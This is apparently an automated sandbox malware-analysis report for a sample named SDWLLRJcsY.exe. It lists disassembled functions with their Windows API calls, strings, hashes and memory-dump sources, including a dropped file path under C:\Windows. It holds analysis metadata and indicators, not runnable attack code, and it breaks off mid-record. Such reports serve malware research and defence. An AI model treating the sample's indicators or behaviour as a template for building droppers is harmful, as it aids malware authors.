                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                      Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(?), ref: 00401DB6
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                      • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID: Calibri
                                      • API String ID: 3808545654-1409258342
                                      • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                      • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                      • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                      • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                      Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                      • MulDiv.KERNEL32(00074600,00000064,000F2F30), ref: 00402E20
                                      • wsprintfW.USER32 ref: 00402E30
                                      • SetWindowTextW.USER32(?,?), ref: 00402E40
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402E2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                      • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                      • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                      Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID:
                                      • API String ID: 2667972263-0
                                      • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                      • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                      • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                      • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                      Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                      • wsprintfW.USER32 ref: 00404B16
                                      • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$6B
                                      • API String ID: 3540041739-3884863406
                                      • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                      • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                      • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                      • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                      Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
                                      • lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidelstrlen
                                      • String ID: C:\Windows\Intragantes.geo$sarcoderma
                                      • API String ID: 3109718747-3933101654
                                      • Opcode ID: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                      • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                      • Opcode Fuzzy Hash: 0ec32d5fc753f1a73e59ed2e949e40f7473725568fa61f063b052c02e944df7f
                                      • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                      Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                      • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                      • Opcode Fuzzy Hash: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                      • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                      Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-3081826266
                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                      • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                      • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                      Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                      • GetTickCount.KERNEL32 ref: 00402E8E
                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                      • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                      • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                      Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00405253
                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                        • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                      • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                      • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                      Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                      • GlobalFree.KERNEL32(?), ref: 004038E6
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1100898210-3081826266
                                      • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                      • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                      • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                      • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                      Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SDWLLRJcsY.exe,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SDWLLRJcsY.exe,C:\Users\user\Desktop\SDWLLRJcsY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
